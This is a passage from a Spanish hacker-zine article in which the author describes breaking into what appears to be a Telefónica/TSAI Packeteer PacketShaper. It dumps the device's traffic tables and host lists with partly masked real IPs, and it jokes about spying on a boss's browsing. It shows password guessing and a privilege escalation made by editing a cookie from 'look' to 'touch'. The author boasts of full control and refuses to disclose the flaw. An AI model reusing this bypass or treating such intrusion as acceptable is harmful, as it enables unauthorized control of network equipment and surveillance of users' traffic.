1.5 23 Peticiones_Web_TSAI --- 939 917 23 Peticiones_Web_Telefonica --- 1.6 1.6 16 Peticiones_Web_Iberonline --- 1.4 1.3 128 Peticiones_ESIWeb2B Peticiones_Web_Mundiprensa --- 2.3 2.3 21 Peticiones_ESIWeb2B_default --- 2.1 2.1 23 Peticiones_ESIWeb2D Peticiones_ESIWeb2D_default --- 2.0 1.9 66 Proxy_Clientes --- 1.1 283 859 Peticiones_Web_INCA --- 2.5 2.3 212 Proxy_Telefonica --- 106 100 7 Peticiones_Servidores_ESIAMI --- 648 463 185 Peticiones_Double_Click --- 830 170 660 Peticiones_Grupo_Teleline --- 2.2 1.8 394 Ingenieria_Clientes --- 654 587 67 Peticiones_Housing --- 379 199 180 Backbone --- 453 395 57 Peticiones_InfoSite --- 1.8 1.6 204 Default --- 894 586 308 Outbound Peticiones_Proxy_Corporativos --- 733 31 702 Peticiones_Proxy_TSAI --- 1.0 58 982 AltaVista --- 85 57 28 Mall_BBV --- 30 10 19 Grupo_El_Pais --- 36 14 21 Pet_Proxy_Clientes --- 928 33 895 Pet_Proxy_NT --- 1.1 297 767 Peticiones_Correo_Telefonica --- 805 196 609 Mensatex_Int --- 1.9 80 1.8 Peticiones_Proxy_Telefonica --- 922 42 880 Web_1_millon --- 95 52 43 Web_GIS --- 71 56 14 Web_PAM --- 134 95 39 Peticiones_Proxy_ABC --- 919 430 489 Grupo_TeleLine --- 2.3 1.0 1.2 Servidores_ESIAMI --- 23 5 18 Peticiones_Ingenieria_Clientes --- 1.0 503 539 Housing --- 893 450 443 Backbone_Salida --- 436 226 210 Total_Webs_Infosite --- 154 97 56 Default --- 383 321 62 $$ Como veis hay dos grandes divisiones OUTBOUND e INBOUND que son digamos $$ las 'raices' del arbol de clases en PS. $$ Este es un caudal de datos muy sabroso que nos permite distinguir en $$ cada caso como esta respondiendo la red y el servidor. $$ Quien dijo que eso no se podia saber/hacer? :-> $$ Mencionaremos al Grupo_TeleLine como consistentemente malo tanto en $$ trafico de entrada como en el de salida. Sufridos usuarios cautivos... $$ Vemos aqui como aparecen por muchos sitios los nombres de Telefonica y $$ sus secuaces, digo filiales, (Teleline, TSAI, Ole, el Congreso ...) $$ tambien vemos a El Pais, ABC, Altavista, BBV, Iberia... $$ Caramba, cualquiera diria que nos hemos metido de lleno en el centro $$ del trafico de Internet en Espa~a. Hum?. Puede. PacketShaper> help net View network statistics usage: net nic | ip | pna PacketShaper> net pna udp: 28020 datagrams delivered to users 3 datagrams received for unknown ports 0 datagrams received with other errors 27725 datagrams sent tcp: 15655 segments sent 16 segments retransmitted 0 segments sent with RST flag 16679 segments received 0 segments received in error 36 failed TCP connection attempts 2 TCP connections reset ip: 101961 received from interfaces 0 drops due to format errors 57042 drops due to invalid addresses 0 drops due to unknown protocol 0 discarded with no problems 43600 supplied by IP user protocols 0 dropped due to no routes 0 IP datagrams forwarded PacketShaper> traffic tree Class name Type Class Policy Cur 1 Min Peak hits hits rate avg rate --------------------------------------------------------------------------- /Inbound + n/a 4.9M 4.6M n/a Proxy_Corporativos 70652 n/a 6610 18.2k 871k Proxy_TSAI 46948 n/a 678 4478 4.2M Pet_Web_Telefonica_Anonimo 10935 n/a 0 1669 46.6k Correo_Telefonica 148363 n/a 166 3862 9.8M LIBRE1 0 n/a 0 0 0 Peticiones_ESINT70 407142 n/a 12.2k 25.0k 169k Peticiones_ESIWeb2 n/a 2009 18.7k n/a Pet_www.congreso.es 17639 n/a 193 804 100k Pet_www.bbv.es 32795 n/a 212 2246 119k Peticiones_ESIWeb2_default 197046 n/a 598 15.6k 198k Proxy_NT_Corporativos 12595 n/a 3842 3887 231k Pet_Mall_Alcampo 42927 n/a 5178 6205 98.3k Pet_Mall_BBV 72721 n/a 0 3 117k Pet_Mall_CajaMadrid 23140 n/a 2242 2131 77.1k Peticiones_1_millon 23903 n/a 10.3k 18.7k 102k Peticiones_El_Pais 2789176 n/a 161k 154k 1.5M Peticiones_Housing_Citroen 0 n/a 0 0 0 Peticiones_InfoNegocio 181839 n/a 4705 3414 81.1k Peticiones_Web_Educalia 63128 n/a 38 411 149k Peticiones_Web_FondosWeb 11034 n/a 0 365 68.3k Peticiones_ESINT10 10302 n/a 0 5 54.9k Peticiones_AltaVista 586639 n/a 34.3k 37.7k 185k Peticiones_Housing_Ifigenia 0 n/a 0 0 0 Peticiones_Mensatex_Int 3087 n/a 0 1 111k Peticiones_Web_GIS 37372 n/a 246 1756 74.6k Peticiones_Web_Nestle 53107 n/a 0 1 87.8k Peticiones_Web_PAM 1351396 n/a 105k 105k 357k Peticiones_Web_TKON 6 n/a 0 0 104 Peticiones_Web_TTD 1103 n/a 0 3 14.5k Proxy_ABC 173265 n/a 183k 58.2k 468k News_Entrada 3319 n/a 517k 161k 9.9M Peticiones_ESIWeb2c n/a 18.9k 16.8k n/a Peticiones_AEAT 2812 n/a 985 377 14.4k Peticiones_ESIWeb2c_default 413193 n/a 16.9k 16.4k 212k Peticiones_Iberia 325354 n/a 10.6k 21.6k 122k Peticiones_Web_TSAI 6614 n/a 109 98 28.2k Peticiones_Web_Telefonica 438256 n/a 28.5k 31.6k 296k Peticiones_Web_Inst._Cervantes 5416 n/a 100 63 530 Peticiones_Housing_Tecknoland 98 n/a 0 26 1259 Peticiones_Housing_Atenet 0 n/a 0 0 0 Peticiones_Housing_Autismo 0 n/a 0 0 0 Peticiones_Web_Iberonline 411910 n/a 7316 8201 142k Peticiones_ESIWeb2B n/a 1 154 n/a Peticiones_Web_Mundiprensa 3012 n/a 0 3 32.5k Peticiones_ESIWeb2B_default 23000 n/a 0 151 121k Peticiones_ESIWeb2D n/a 0 19 n/a Peticiones_Web_NMP 0 n/a 0 0 0 Peticiones_ESIWeb2D_default 6176 n/a 0 19 42.7k Peticiones_Web_ABC 1251 n/a 0 3 3587 Proxy_Clientes 1683648 n/a 1.1M 668k 4.7M Peticiones_Web_INCA 369723 n/a 8417 14.2k 102k Proxy_Telefonica 921032 n/a 328k 353k 5.3M Peticiones_Servidores_ESIAMI 47383 n/a 203k 195k 7.9M Entrada_InfoMail_InfoVia 0 n/a 0 0 0 Entrada_InfoMail_Internet 4 n/a 0 0 3635 Peticiones_Renault 0 n/a 0 0 0 Peticiones_Double_Click 27720 n/a 0 174 15.0k Peticiones_Grupo_Teleline 9473517 n/a 1.4M 1.2M 8.7M Ingenieria_Clientes 12956 n/a 111 378 2.2M Peticiones_Housing 191535 n/a 19.0k 28.4k 5.0M Accesos_Corporativos 1778 n/a 0 6638 254k Backbone 17911340 n/a 134k 159k 790k DeutschBank_Particulares 0 n/a 0 0 0 Cable_TeleLine 0 n/a 0 0 0 Peticiones_Housing_OLE 0 n/a 0 0 0 Peticiones_InfoSite 11632094 n/a 327k 994k 4.4M Default P I3567187 53848589 283k 239k 3.4M /Outbound + n/a 11.2M 11.4M n/a Peticiones_Proxy_Corporativos 66987 n/a 2981 4605 691k Peticiones_Proxy_TSAI 40695 n/a 151 459 623k Web_Telefonica_Anonimo 17145 n/a 0 1412 200k CorporativoWeb_ElPais 15 n/a 0 0 279 Web_FondosWeb + 14798 n/a 0 502 902k AltaVista 640764 n/a 301k 442k 7.1M LIBRE2 0 n/a 0 0 0 Mall_Alcampo 46452 n/a 6900 13.3k 229k Mall_BBV 78803 n/a 0 1653 4.5M Grupo_El_Pais + 3900075 n/a 1.4M 1.3M 9.6M InfoNegocio 218101 n/a 9431 14.0k 552k Mall_CajaMadrid 24459 n/a 16.5k 13.0k 514k Pet_Proxy_Clientes 1733716 n/a 907k 688k 4.5M Pet_Proxy_NT 16047 n/a 1953 2648 2.0M Peticiones_Correo_Telefonica 37453 n/a 0 782 3.7M Housing_Citroen 0 n/a 0 0 0 Housing_Ifigenia 0 n/a 0 0 0 Mensatex_Int 2790 n/a 0 2 155k Peticiones_Proxy_Telefonica 894749 n/a 40.0k 40.2k 1.5M Web_1_millon 36348 n/a 6130 9266 5.4M Web_ABC + 1214 n/a 0 0 880 Web_Educalia + 74719 n/a 2069 5513 334k Web_ESINT10 11683 n/a 0 1 691k Web_ESINT70 519228 n/a 50.7k 151k 7.3M Web_ESIWeb2 n/a 34.4k 68.7k n/a www.bbv.es 66243 n/a 1375 9054 2.8M www.congreso.es 13137 n/a 3582 11.4k 5.2M Web_ESIWeb2_default 254792 n/a 12.2k 48.3k 4.1M Web_GIS 45575 n/a 921 13.6k 4.4M Web_Iberia 404922 n/a 47.2k 112k 1.0M Web_Iberonline 528112 n/a 30.9k 43.6k 955k Web_INCA 392867 n/a 72.4k 94.3k 827k Web_Nestle 63924 n/a 0 121 335k Web_PAM 1384834 n/a 505k 602k 5.3M Web_TKON + 8 n/a 0 0 51 Housing_Tecknoland 70 n/a 0 0 40 News_Salida 6262 n/a 61.5k 20.3k 1.2M Web_ESIWeb2C n/a 181k 205k n/a Web_AEAT + 12916 n/a 7406 3865 98.2k Web_ESIWeb2C_default 610388 n/a 83.1k 201k 2.8M Web_ESIWeb2B n/a 175 81 n/a Web_Mundiprensa 6127 n/a 0 1 910k Web_ESIWeb2B_default 25017 n/a 87 80 1.3M Web_ESIWeb2D n/a 255 91 n/a Web_NMP 0 n/a 0 0 0 Web_ESIWeb2D_default 8697 n/a 127 91 541k Web_Instituto_Cervantes + 5407 n/a 0 0 0 Web_Telefonica 579687 n/a 164k 179k 2.9M Web_TSAI 9089 n/a 402 48 253k Housing_Autismo 0 n/a 0 0 0 Peticiones_Proxy_ABC 183015 n/a 207k 71.3k 350k Web_TTD 3977 n/a 716 51 26.8k Grupo_TeleLine 11240023 n/a 4.4M 4.2M 8.3M Salida_InfoMail_InfoVia 0 n/a 0 0 0 Servidores_INET 56 n/a 0 0 0 Servidores_ESIAMI 81892 n/a 201k 188k 11.6M Servidores_ACE 0 n/a 0 0 0 Servidores_TSAI 54 n/a 0 0 2524 WEB_Renault 0 n/a 0 0 0 Double_Click 28110 n/a 0 504 12.8k Salida_InfoMail_Internet 4 n/a 0 0 0 Peticiones_Ingenieria_Clientes 14435 n/a 121 136 902k Housing 146328 n/a 5996 8043 188k Backbone_Salida 18102167 n/a 293k 320k 13.4M Housing_OLE 0 n/a 0 0 0 Pet_Cable_TeleLine 0 n/a 0 0 0 Peticiones_Acceso_Masivo 0 n/a 0 0 0 Total_Webs_Infosite 11554380 n/a 597k 818k 9.5M Default P I3590212 57739062 1.4M 1.8M 9.4M $$ Aqui vemos el trafico en MBs. Nos fijamos en mas gente como Renault, $$ Caja Madrid, Double-Click, Teknoland, Instituto Cervantes.. ya saben $$ por donde van sus paquetes?. $$ NOTA: Los simbolitos + indican las clases con su propia particion PacketShaper> traffic bandwidth Aggregate usage (shaping not on) Inbound rate: 4.0M peak: 20.9M Outbound rate: 11.3M peak: 25.5M $$ Parece que la cosa esta tranquila, probemos otro comando. PacketShaper> hostdb info IP Address Conn RTT Cur 1 Min Peak to PS rate avg rate --------------------------------------------------- 194.xxx.?3.5 I 18869 3 3.1M 3.0M 6.6M 194.xxx.?5.37 I 125 3 60.4k 9526 1.9M 194.xxx.?3.133 O 49 2 4175 11.7k 2.2M 194.xxx.?3.40 I 5776 3 2.4M 1.9M 9.9M 194.xxx.?2.19 I 14 1 3340 4793 10.0M 192.168.122.6 I 198 --- 1425 3332 849k 194.xxx.?5.253 I 176 1 29.4k 22.1k 1.7M 195.xxx.?1.230 I 193 7 2147 21.2k 5.9M 209.143.147.21 0 --- 0 75 225 206.184.139.199 O 0 --- 0 40 2038 194.xxx.?5.25 I 1009 2 200k 136k 1.1M 194.xxx.?3.173 I 191 1 387k 298k 1.2M 195.235.10.2 O 1 233 0 27 2242 195.235.10.192 O 1 --- 0 3 342 194.xxx.?5.219 I 595 2 216k 167k 1.2M 194.xxx.?5.24 I 865 2 180k 189k 2.8M 195.53.208.57 O 0 --- 1219 369 1431 213.4.34.110 0 --- 0 0 658 194.xxx.?3.7 I 4 2 6601 6080 81.4k 200.33.116.55 O 1 245 0 1274 38.5k 207.235.5.40 O 0 --- 0 20 48 206.246.194.7 0 --- 9 9 9 136.199.8.101 O 0 --- 11 11 11 200.21.234.55 O 2 504 29.5k 20.6k 48.9k 213.4.37.176 0 --- 0 279 2602 209.45.32.131 O 0 692 0 7 44.0k 193.146.83.112 O 0 231 0 17 10 192.220.251.1 0 --- 29 29 29 206.13.30.11 O 0 --- 17 17 17 62.82.8.229 O 1 354 0 2 123k 62.0.153.144 O 1 1.0 1348 5064 40.2k 141.1.1.12 O 0 --- 2390 727 2454 9998 entries $$ La leche!!!. En vaya hora se me ocurrio ponerlo, aunque lo ves recortado $$ esto me ha listado 9998 entradas de IPs que estan manteniendo conexion $$ con alguna IP del interface INSIDE. $$ Mira, ahora hago un grep de la IP de mi jefe y me entero si esta leyendo $$ el ABC. :-DD PacketShaper> hostdb show IP Address Where Speed/Effective Slower/Faster TCP/UDP ref ------------------------------------------------------------------- 194.xxx.?3.5 inside 1.5M/1.9M 0/0 18580/19 194.xxx.?5.37 inside 1.5M/749.0k 0/0 110/0 194.xxx.?3.133 outside 1.5M/2.4M 0/0 41/0 194.xxx.?3.40 inside 0/6.2M 0/0 5919/1 194.xxx.?2.19 outside 0/11.7M 0/0 15/0 195.235.112.96 0/4800 0/0 10/0 195.235.116.18 outside 56.0k/62439 0/0 1/0 216.121.32.211 outside 1.5M/415.7k 0/0 0/0 192.168.131.1 outside 56.0k/141.5k 0/0 9/2 192.112.36.4 outside 0/0 0/0 0/0 194.xxx.?3.120 inside 10.0M/6.7M 0/0 275/0 194.xxx.?5.14 inside 10.0M/4.8M 0/0 915/0 206.137.97.83 outside 0/0 0/0 0/0 195.235.64.30 outside 56.0k/112.4k 0/0 10/0 194.xxx.?2.12 inside 10.0M/11.4M 0/0 44/0 194.xxx.?3.142 outside 0/9.4M 0/0 32/0 196.27.22.111 outside 0/80430 0/0 1/0 194.xxx.?3.170 inside 0/7.9M 0/0 405/1 194.xxx.?3.114 inside 10.0M/7.6M 0/0 26/2 200.36.150.16 outside 28.8k/60116 0/0 3/0 195.235.25.175 outside 28.8k/27480 0/0 0/0 208.234.0.51 outside 0/0 0/0 0/0 209.207.164.207 outside 0/396.9k 0/0 1/0 194.xxx.?4.201 outside 0/0 0/0 0/0 193.144.12.130 outside 1.5M/964.2k 0/0 16/0 213.4.34.235 0/4800 0/0 1/0 194.xxx.?3.134 outside 0/10.6M 0/0 64/0 195.235.11.66 outside 28.8k/251.9k 0/0 4/0 195.235.214.115 outside 64.0k/87360 0/0 2/0 195.235.10.219 outside 28.8k/75669 0/0 2/0 195.xx.??5.32 inside 0/2.3M 0/0 98/0 195.235.120.139 outside 56.0k/90795 0/0 20/0 195.235.39.130 outside 10.0M/3.3M 0/0 5/5 195.235.125.68 outside 56.0k/55312 0/0 1/0 195.235.123.1 outside 128k/113.5k 0/0 1/0 10.0.1.1 inside 1.5M/1.3M 0/0 1/7 212.25.130.47 outside 33.6k/62238 0/0 2/0 195.xxx.??3.17 inside 0/1.8M 0/0 4032/0 195.235.118.59 outside 4800/4602 0/0 1/0 195.235.10.214 outside 28.8k/85246 0/0 1/0 195.235.209.187 0/28800 0/0 2/0 192.168.121.1 outside 128k/269.9k 0/0 1/0 194.xxx.?5.51 inside 0/2.2M 0/0 71/0 194.xxx.?7.106 outside 64.0k/111.0k 0/0 0/0 194.xxx.?2.44 inside 1.5M/1.6M 0/0 26/0 194.196.84.2 outside 1.5M/437.1k 0/0 1/0 194.xxx.?5.243 inside 0/4.5M 0/0 51/0 194.xxx.?3.174 inside 0/6.4M 0/0 145/0 193.0.14.129 outside 0/0 0/0 0/0 195.xx.??5.11 inside 10.0M/2.9M 0/0 222/0 195.235.118.44 outside 28.8k/28303 0/0 1/0 207.46.42.17 outside 10.0M/6.1M 0/0 0/0 212.155.41.231 outside 256k/156.6k 0/0 4/0 194.xxx.?3.135 outside 0/8.3M 0/0 54/0 9980 entries $$ No escarmiento!!. Otras 9980 entradas que me he comido. Casi que me ha $$ dado tiempo a leer El Quijote. Tengo controlado tanto trafico que me $$ aburro como un enano. $$ Por cierto, quien seran los pobres que van a 4800 bps? XDDD PacketShaper> exit Y salgo, entro en la web, para imprimir un par de informes y mirarmelos con calma, si quereis cotillear os informo que el Grupo_Teleline se comio casi el 40% del trafico, despues viene el Proxy_Telefonica, el Proxy_Clientes y en cuanto a trafico enviado Peticiones_El_Pais esta muy arriba. Me imprimo una grafica que muestra que Correo_Telefonica ha pasado unos dias muy malitos con picos que rozaban su maxima carga. Ah, lo del touch!. Casi escondido a la derecha hay un boton que pone Access y al lado se lee "look", toco el boton para cambiar el nivel y me sale una caja en la que me pide la clave. Tiempo de hacer valer mi experiencia. Pruebo sucesivamente: root, amor, Dios, sexo, machoman, admin, queseyo. [Si ves tu clave aqui hazme caso y cambiala XDDD] NO FUNCIONA!!!!. Vaya timo, voy a devolver la pelicula Hackers. Lo malo es que mis trucos de super-hacker se han agotado. Huh...tiempo de ponerse a pensar. Si no me equivoco no he vuelto a poner claves porque me ha dado una cookie para entrar directo, vamos a ver el fichero de cookies Tengo dos de este site, voy a poner aqui la segunda. 194.*.xxx.* FALSE FALSE 1514809221 PSxxV310 look Dominio, seguro, fecha de expiracion, nombre y valor. Sera posible??. No puede ser tan facil pero por probar.... Cierro el navegador para que escriba todas las cookies en memoria al fichero. Copio el fichero por seguridad (cookies --> cookies.old) Y cambio la cookie a: 194.*.xxx.* FALSE FALSE 1514809221 PSxxV310 touch Cierro el fichero, vuelvo a lanzar el navegador y me dirijo al site del PS, ahora al lado de Access pone: Touch Y funciona. Es mas que un agujero, es una autopista de seis carriles!!. Tengo el CONTROL TOTAL del PS. Game Over. - PARTE IV-. ADIOS AL PAQUETE Pues no, no hice nada de lo que media el cuerpo ni nada de que lo que se esperaria de un 'piligroso delicuente hinfosmatico'. Que me pedia el cuerpo?. - Poner todo el trafico de Iberia a un _maximo_ de 1kb/s : Moraleja: Si va a volar con Iberia, vaya acostumbrandose a esperar. - Crear una nueva clase de trafico en Correo_Telefonica para todos los mensajes a Villalonga (tendra el correo ahi digo yo) y eliminarlos sin avisar :-O - Vigilar todo el trafico que genera el servidor del Congreso a ver si se esta haciendo buen uso de el - Guipar todas las sesiones Telnet y FTP (da mucho juego) - Numero 1: Aplicar un Redirect URL a la web de Telefonica. Que se esperaria de un 'piligroso delicuente hinfosmatico'? - Bloquear todo el trafico a El_Pais y el ABC - Resetear el PS, desconfigurarlo, cargar una nueva imagen del SO troyanizada. - Dejar a todos los usuarios de Teleline sin servicio. - Darle un Discard a Backbone_Salida, veras tu como nos reiamos. - Pegar un Never Admit masivo y cargarme tanto trafico que la quejas iban a llegar hasta la ONU. Lo podia haber hecho por supuesto, poner el shaping a on y crear una serie de politicas Never-Admit, Redirect URL, hacer un Discard salvaje... Podia haber hecho con el PS lo que quisiera, era completamente mio. Venci y se acabo. No era un reto contra nadie en particular y no me llevo grandes energias pero si me dejo satisfecho. Siempre hemos defendido en SET la etica que dice eso de que los hackers entran para mirar, para explorar y no para reventar cosas o chafar servicios. Por grande que fuese la tentacion (y lo era, me costo no pensar en ello) hay que demostrar que eso no son palabras vacias sino que cuando se tiene oportunidad de demostrarlo se demuestra. Aprendi mucho sobre el PacketShaper y algo sobre Timofonica a la que tenia abandonada desde hace tiempo. Puede que los defensores del comercio electronico se escandalicen, como va a prosperar esto si los melenudos se meten en todas partes?. El mangante que hace un par de a~os se hacia admin en los routers de Infovia ahora se hace admin y controla la mitad del trafico de Internet en Espa~a. Supongo que a eso es a lo que llamamos progreso ;->. Tranquilos, os podia ir peor. Id al SIMO y coged folletos de propaganda. Comprad. Asistid a conferencias de Arias Pasmado y Villalonga. Y puede que algunos se decepcionen porque les hubiese gustado ver como www.telefonica.es se desviaba a www.timofonica.com (por ejemplo) pero realmente creeis que el asaltar paginas web consigue algo mas que satisfacer nuestro ego?. Solo sirve para dar razones a los que no acusan de delicuentes pero no quiero dar sermones a nadie. Cada palo que aguante su vela. Timofonicos, grandes empresas y demas beautiful people de Internet: Mirad, podeis poner firewalls, IDS y todos los inventos de ultima generacion que querais, entrabamos antes, seguimos entrando ahora y seguiremos entrando cuando queramos en el futuro. Vosotros teneis el dinero, los servidores y el soft hiper-caro Nosotros solo el control. Despues de todo no os esta yendo tan mal :-)). Ahora os dejo, como he comentado al principio yo tenia otros asuntos y no puedo seguir perdiendo el tiempo contando los agujeros de la red Timofonica. - ANEXO A-. EL HACKER RESPONSABLE El manual del hacker politicamente correcto indica que yo deberia contactar con: A- Los (ir)responsables de TSAI B- Los paquetes de Packeteer. A TSAI, deberia informarles de mis descubrimientos y de como asegurar el PS (esto ya en plan guay total). Un carajo. No soy ningun white hat ni nada asi, la gente de TSAI esta leyendo esto asi que voy a suponer que son capaces de encontrar su PS antes que el resto de lectores lo haga y que van a cerrarme el acceso total del que llevo disfrutando un largo tiempo. Leedse los manuales o contratad un auditor de seguridad, pero como en el fondo soy un trozo pan buscad algo como "setup outside secure". Deshabilitad el acceso Web. B Packeteer, deberia informarles de lo grandioso del bug que permite saltarse las restricciones a la torera. Un carajo. La proxima vez que no se pongan tan tontos y pejigosos para repartir un manual de mi***a. [...] Ni ley ni deber me invitaron a la lucha, ni los estadistas ni la turba clamorosa, un solitario impulso de deleite me trajo a este tumulto entre las nubes. [...] William Butler Yeats Y recordad, hagais lo que hagais. Tened cuidado ahi fuera. Paseante